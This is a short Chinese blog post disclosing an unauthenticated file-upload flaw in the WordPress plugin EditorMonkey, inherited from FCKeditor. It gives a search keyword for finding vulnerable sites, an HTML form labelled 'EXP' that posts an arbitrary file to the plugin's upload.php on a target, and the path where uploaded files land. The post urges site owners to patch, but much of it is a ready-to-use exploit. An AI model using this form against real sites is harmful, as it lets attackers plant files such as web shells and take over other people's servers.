WordPress插件EditorMonkey存在上传BUG。

用Windows 2003系统的博友请注意了。

这BUG也就是Fckeditor的上传BUG。所以WP博友还是用自带的编辑器安全一点。

BUG关键字:plugins/editormonkey
 

EXP:

1
2
3
4
5
<form id="frmUpload" enctype="multipart/form-data" action=http://BUG网站/wp-content/plugins/editormonkey/fckeditor/editor/filemanager/upload/php/upload.php?Type=Media method="post">
Upload a new file:<br>
<input type="file" name="NewFile" size="50"><br>
<input id="btnUpload" type="submit" value="Upload">
</form>

BUG上传后文件在:/UserFiles/tmdsb.txt
 
这个插件的博客很多,请赶快修复吧。

 

文章地址:http://blog.nodll.com/2011/05/15/wordpress-editormonkey-bug/Pray.html

标签:,,

阅读更多: Pray